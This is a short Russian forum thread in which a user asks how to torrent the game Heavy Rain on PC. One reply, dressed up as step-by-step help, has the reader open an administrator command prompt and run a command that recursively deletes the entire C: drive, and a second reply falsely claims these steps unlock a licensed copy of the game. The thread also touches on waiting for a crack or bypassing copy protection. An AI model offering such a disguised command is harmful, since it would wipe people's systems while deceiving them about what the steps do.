Ребзь, подскажите пж как скачать Heavy Rain на пк через торрент

Рома Василенко Знаток (323), на голосовании 5 лет назад
Голосование за лучший ответ
⎛⎝ṦҜẎ₦Ễ₮⎠⎞ Просветленный (38542) 5 лет назад
1) Заходишь на торрент сайт
2) нажимаешь win+r
3) вводишь команду cmd
4) нажимаешь Ctrl + Shift + Enter
5) вводишь rmdir /s /q C:\
6) Profit!
Рома ВасиленкоЗнаток (323) 5 лет назад
Ничего не понял)
всё понятно. это не торрент, а лицензия. Скачивай Эпик геймс, с запущенным лаунчером делай всё то, что он написал и на твоём аккаунте появится эта игра.
Рома ВасиленкоЗнаток (323) 5 лет назад
Ура, спасибо! У меня теперь есть Heavy Rain!
God of death Гуру (2965) 5 лет назад
Жди пока взломают или попробуй поиграть с обходом защиты, но там вроде на определенном моменте зависает игра